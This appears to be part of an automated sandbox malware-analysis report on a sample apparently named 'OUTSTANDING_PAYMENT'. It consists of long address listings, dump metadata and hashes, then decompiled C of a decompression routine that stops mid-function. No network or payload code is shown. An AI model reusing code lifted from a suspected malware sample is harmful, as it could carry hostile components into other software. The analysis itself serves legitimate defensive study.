                                                                                                                        0x00407127
                                                                                                                        0x0040712a
                                                                                                                        0x0040712d
                                                                                                                        0x00407137
                                                                                                                        0x00000000
                                                                                                                        0x00407137
                                                                                                                        0x00407122
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407143
                                                                                                                        0x00407147
                                                                                                                        0x0040714e
                                                                                                                        0x00407151
                                                                                                                        0x00407154
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407157
                                                                                                                        0x0040715a
                                                                                                                        0x0040715d
                                                                                                                        0x0040715d
                                                                                                                        0x00407160
                                                                                                                        0x00407163
                                                                                                                        0x00407166
                                                                                                                        0x00407166
                                                                                                                        0x00407169
                                                                                                                        0x00407170
                                                                                                                        0x00407175
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407203
                                                                                                                        0x00407203
                                                                                                                        0x00407207
                                                                                                                        0x004075a5
                                                                                                                        0x00000000
                                                                                                                        0x004075a5
                                                                                                                        0x0040720d
                                                                                                                        0x00407210
                                                                                                                        0x00407213
                                                                                                                        0x00407217
                                                                                                                        0x0040721a
                                                                                                                        0x00407220
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407225
                                                                                                                        0x00407228
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406df8
                                                                                                                        0x00406df8
                                                                                                                        0x00406dfc
                                                                                                                        0x00407569
                                                                                                                        0x00000000
                                                                                                                        0x00407569
                                                                                                                        0x00406e02
                                                                                                                        0x00406e05
                                                                                                                        0x00406e08
                                                                                                                        0x00406e0c
                                                                                                                        0x00406e0f
                                                                                                                        0x00406e15
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e1a
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e20
                                                                                                                        0x00406e23
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e29
                                                                                                                        0x00406e2f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e35
                                                                                                                        0x00406e35
                                                                                                                        0x00406e39
                                                                                                                        0x00406e3c
                                                                                                                        0x00406e3f
                                                                                                                        0x00406e42
                                                                                                                        0x00406e45
                                                                                                                        0x00406e46
                                                                                                                        0x00406e49
                                                                                                                        0x00406e4b
                                                                                                                        0x00406e51
                                                                                                                        0x00406e54
                                                                                                                        0x00406e57
                                                                                                                        0x00406e5a
                                                                                                                        0x00406e5d
                                                                                                                        0x00406e60
                                                                                                                        0x00406e63
                                                                                                                        0x00406e7f
                                                                                                                        0x00406e82
                                                                                                                        0x00406e85
                                                                                                                        0x00406e88
                                                                                                                        0x00406e8f
                                                                                                                        0x00406e93
                                                                                                                        0x00406e95
                                                                                                                        0x00406e99
                                                                                                                        0x00406e65
                                                                                                                        0x00406e65
                                                                                                                        0x00406e69
                                                                                                                        0x00406e71
                                                                                                                        0x00406e76
                                                                                                                        0x00406e78
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e9c
                                                                                                                        0x00406ea3
                                                                                                                        0x00406ea6
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb5
                                                                                                                        0x00407575
                                                                                                                        0x00000000
                                                                                                                        0x00407575
                                                                                                                        0x00406ebb
                                                                                                                        0x00406ebe
                                                                                                                        0x00406ec1
                                                                                                                        0x00406ec5
                                                                                                                        0x00406ec8
                                                                                                                        0x00406ece
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed3
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406edc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ede
                                                                                                                        0x00406ee1
                                                                                                                        0x00406ee4
                                                                                                                        0x00406ee7
                                                                                                                        0x00406eea
                                                                                                                        0x00406eed
                                                                                                                        0x00406ef0
                                                                                                                        0x00406ef3
                                                                                                                        0x00406ef6
                                                                                                                        0x00406ef9
                                                                                                                        0x00406efc
                                                                                                                        0x00406f14
                                                                                                                        0x00406f17
                                                                                                                        0x00406f1a
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f20
                                                                                                                        0x00406f24
                                                                                                                        0x00406f26
                                                                                                                        0x00406efe
                                                                                                                        0x00406efe
                                                                                                                        0x00406f06
                                                                                                                        0x00406f0b
                                                                                                                        0x00406f0d
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f29
                                                                                                                        0x00406f30
                                                                                                                        0x00406f33
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00406f33
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f75
                                                                                                                        0x00406f75
                                                                                                                        0x00406f79
                                                                                                                        0x00407581
                                                                                                                        0x00000000
                                                                                                                        0x00407581
                                                                                                                        0x00406f7f
                                                                                                                        0x00406f82
                                                                                                                        0x00406f85
                                                                                                                        0x00406f89
                                                                                                                        0x00406f8c
                                                                                                                        0x00406f92
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f97
                                                                                                                        0x00406f9a
                                                                                                                        0x00406f9a
                                                                                                                        0x00406fa0
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f41
                                                                                                                        0x00000000
                                                                                                                        0x00406f41
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa5
                                                                                                                        0x00406fa8
                                                                                                                        0x00406fab
                                                                                                                        0x00406fae
                                                                                                                        0x00406fb1
                                                                                                                        0x00406fb4
                                                                                                                        0x00406fb7
                                                                                                                        0x00406fba
                                                                                                                        0x00406fbd
                                                                                                                        0x00406fc0
                                                                                                                        0x00406fd8
                                                                                                                        0x00406fdb
                                                                                                                        0x00406fde
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe4
                                                                                                                        0x00406fe8
                                                                                                                        0x00406fea
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fca
                                                                                                                        0x00406fcf
                                                                                                                        0x00406fd1
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fed
                                                                                                                        0x00406ff4
                                                                                                                        0x00406ff7
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00407286
                                                                                                                        0x00407286
                                                                                                                        0x0040728a
                                                                                                                        0x004075b1
                                                                                                                        0x00000000
                                                                                                                        0x004075b1
                                                                                                                        0x00407290
                                                                                                                        0x00407293
                                                                                                                        0x00407296
                                                                                                                        0x0040729a
                                                                                                                        0x0040729d
                                                                                                                        0x004072a3
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407056
                                                                                                                        0x00407056
                                                                                                                        0x00407059
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407395
                                                                                                                        0x00407399
                                                                                                                        0x004073bb
                                                                                                                        0x004073be
                                                                                                                        0x004073c8
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x0040739b
                                                                                                                        0x0040739e
                                                                                                                        0x004073a2
                                                                                                                        0x004073a5
                                                                                                                        0x004073a5
                                                                                                                        0x004073a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407452
                                                                                                                        0x00407456
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x0040747b
                                                                                                                        0x00407482
                                                                                                                        0x00407489
                                                                                                                        0x00407489
                                                                                                                        0x00000000
                                                                                                                        0x00407489
                                                                                                                        0x00407458
                                                                                                                        0x0040745b
                                                                                                                        0x0040745e
                                                                                                                        0x00407461
                                                                                                                        0x00407468
                                                                                                                        0x004073ac
                                                                                                                        0x004073ac
                                                                                                                        0x004073af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407543
                                                                                                                        0x00407546
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040717d
                                                                                                                        0x0040717f
                                                                                                                        0x00407186
                                                                                                                        0x00407187
                                                                                                                        0x00407189
                                                                                                                        0x0040718c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407194
                                                                                                                        0x00407197
                                                                                                                        0x0040719a
                                                                                                                        0x0040719c
                                                                                                                        0x0040719e
                                                                                                                        0x0040719e
                                                                                                                        0x0040719f
                                                                                                                        0x004071a2
                                                                                                                        0x004071a9
                                                                                                                        0x004071ac
                                                                                                                        0x004071ba
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407490
                                                                                                                        0x00407490
                                                                                                                        0x00407493
                                                                                                                        0x0040749a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040749f
                                                                                                                        0x0040749f
                                                                                                                        0x004074a3
                                                                                                                        0x004075db
                                                                                                                        0x00000000
                                                                                                                        0x004075db
                                                                                                                        0x004074a9
                                                                                                                        0x004074ac
                                                                                                                        0x004074af
                                                                                                                        0x004074b3
                                                                                                                        0x004074b6
                                                                                                                        0x004074bc
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074c1
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c7
                                                                                                                        0x004074c7
                                                                                                                        0x004074cb
                                                                                                                        0x0040752b
                                                                                                                        0x0040752e
                                                                                                                        0x00407533
                                                                                                                        0x00407534
                                                                                                                        0x00407536
                                                                                                                        0x00407538
                                                                                                                        0x0040753b
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00000000
                                                                                                                        0x00407447
                                                                                                                        0x004074cd
                                                                                                                        0x004074d3
                                                                                                                        0x004074d6
                                                                                                                        0x004074d9
                                                                                                                        0x004074dc
                                                                                                                        0x004074df
                                                                                                                        0x004074e2
                                                                                                                        0x004074e5
                                                                                                                        0x004074e8
                                                                                                                        0x004074eb
                                                                                                                        0x004074ee
                                                                                                                        0x00407507
                                                                                                                        0x0040750a
                                                                                                                        0x0040750d
                                                                                                                        0x00407510
                                                                                                                        0x00407514
                                                                                                                        0x00407516
                                                                                                                        0x00407516
                                                                                                                        0x00407517
                                                                                                                        0x0040751a
                                                                                                                        0x004074f0
                                                                                                                        0x004074f0
                                                                                                                        0x004074f8
                                                                                                                        0x004074fd
                                                                                                                        0x004074ff
                                                                                                                        0x00407502
                                                                                                                        0x00407502
                                                                                                                        0x0040751d
                                                                                                                        0x00407524
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x004071c2
                                                                                                                        0x004071c5
                                                                                                                        0x004071fb
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732e
                                                                                                                        0x0040732e
                                                                                                                        0x00407331
                                                                                                                        0x00407333
                                                                                                                        0x004075bd
                                                                                                                        0x00000000
                                                                                                                        0x004075bd
                                                                                                                        0x00407339
                                                                                                                        0x0040733c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407342
                                                                                                                        0x00407346
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00000000
                                                                                                                        0x00407349
                                                                                                                        0x004071c7
                                                                                                                        0x004071c9
                                                                                                                        0x004071cb
                                                                                                                        0x004071cd
                                                                                                                        0x004071d0
                                                                                                                        0x004071d1
                                                                                                                        0x004071d3
                                                                                                                        0x004071d5
                                                                                                                        0x004071d8
                                                                                                                        0x004071db
                                                                                                                        0x004071f1
                                                                                                                        0x004071f6
                                                                                                                        0x0040722e
                                                                                                                        0x0040722e
                                                                                                                        0x00407232
                                                                                                                        0x0040725e
                                                                                                                        0x00407260
                                                                                                                        0x00407267
                                                                                                                        0x0040726a
                                                                                                                        0x0040726d
                                                                                                                        0x0040726d
                                                                                                                        0x00407272
                                                                                                                        0x00407272
                                                                                                                        0x00407274
                                                                                                                        0x00407277
                                                                                                                        0x0040727e
                                                                                                                        0x00407281
                                                                                                                        0x004072ae
                                                                                                                        0x004072ae
                                                                                                                        0x004072b1
                                                                                                                        0x004072b4
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00000000
                                                                                                                        0x00407328
                                                                                                                        0x004072b6
                                                                                                                        0x004072bc
                                                                                                                        0x004072bf
                                                                                                                        0x004072c2
                                                                                                                        0x004072c5
                                                                                                                        0x004072c8
                                                                                                                        0x004072cb
                                                                                                                        0x004072ce
                                                                                                                        0x004072d1
                                                                                                                        0x004072d4
                                                                                                                        0x004072d7
                                                                                                                        0x004072f0
                                                                                                                        0x004072f2
                                                                                                                        0x004072f5
                                                                                                                        0x004072f6
                                                                                                                        0x004072f9
                                                                                                                        0x004072fb
                                                                                                                        0x004072fe
                                                                                                                        0x00407300
                                                                                                                        0x00407302
                                                                                                                        0x00407305
                                                                                                                        0x00407307
                                                                                                                        0x0040730a
                                                                                                                        0x0040730e
                                                                                                                        0x00407310
                                                                                                                        0x00407310
                                                                                                                        0x00407311
                                                                                                                        0x00407314
                                                                                                                        0x00407317
                                                                                                                        0x004072d9
                                                                                                                        0x004072d9
                                                                                                                        0x004072e1
                                                                                                                        0x004072e6
                                                                                                                        0x004072e8
                                                                                                                        0x004072eb
                                                                                                                        0x004072eb
                                                                                                                        0x0040731a
                                                                                                                        0x00407321
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00407321
                                                                                                                        0x00407234
                                                                                                                        0x00407237
                                                                                                                        0x00407239
                                                                                                                        0x0040723c
                                                                                                                        0x0040723f
                                                                                                                        0x00407242
                                                                                                                        0x00407244
                                                                                                                        0x00407247
                                                                                                                        0x0040724a
                                                                                                                        0x0040724a
                                                                                                                        0x0040724d
                                                                                                                        0x0040724d
                                                                                                                        0x00407250
                                                                                                                        0x00407257
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00407257
                                                                                                                        0x004071dd
                                                                                                                        0x004071e0
                                                                                                                        0x004071e2
                                                                                                                        0x004071e5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f44
                                                                                                                        0x00406f44
                                                                                                                        0x00406f48
                                                                                                                        0x0040758d
                                                                                                                        0x00000000
                                                                                                                        0x0040758d
                                                                                                                        0x00406f4e
                                                                                                                        0x00406f51
                                                                                                                        0x00406f54
                                                                                                                        0x00406f57
                                                                                                                        0x00406f5a
                                                                                                                        0x00406f5d
                                                                                                                        0x00406f60
                                                                                                                        0x00406f62
                                                                                                                        0x00406f65
                                                                                                                        0x00406f68
                                                                                                                        0x00406f6b
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070cf
                                                                                                                        0x004070cf
                                                                                                                        0x004070d3
                                                                                                                        0x00407599
                                                                                                                        0x00000000
                                                                                                                        0x00407599
                                                                                                                        0x004070d9
                                                                                                                        0x004070dc
                                                                                                                        0x004070df
                                                                                                                        0x004070e2
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e7
                                                                                                                        0x004070ea
                                                                                                                        0x004070ed
                                                                                                                        0x004070f0
                                                                                                                        0x004070f3
                                                                                                                        0x004070f6
                                                                                                                        0x004070f7
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070fc
                                                                                                                        0x004070ff
                                                                                                                        0x00407102
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407108
                                                                                                                        0x0040710a
                                                                                                                        0x0040710a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x00407350
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407356
                                                                                                                        0x00407359
                                                                                                                        0x0040735c
                                                                                                                        0x0040735f
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407364
                                                                                                                        0x00407367
                                                                                                                        0x0040736a
                                                                                                                        0x0040736d
                                                                                                                        0x00407370
                                                                                                                        0x00407373
                                                                                                                        0x00407374
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407379
                                                                                                                        0x0040737c
                                                                                                                        0x0040737f
                                                                                                                        0x00407382
                                                                                                                        0x00407385
                                                                                                                        0x00407389
                                                                                                                        0x0040738b
                                                                                                                        0x0040738e
                                                                                                                        0x00000000
                                                                                                                        0x00407390
                                                                                                                        0x0040710d
                                                                                                                        0x0040710d
                                                                                                                        0x00000000
                                                                                                                        0x0040710d
                                                                                                                        0x0040738e
                                                                                                                        0x004075c3
                                                                                                                        0x004075e5
                                                                                                                        0x004075eb
                                                                                                                        0x004075ed
                                                                                                                        0x004075f4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x004075fa
                                                                                                                        0x004075fa
                                                                                                                        0x00000000

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                                        • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                                                        • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                                        • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
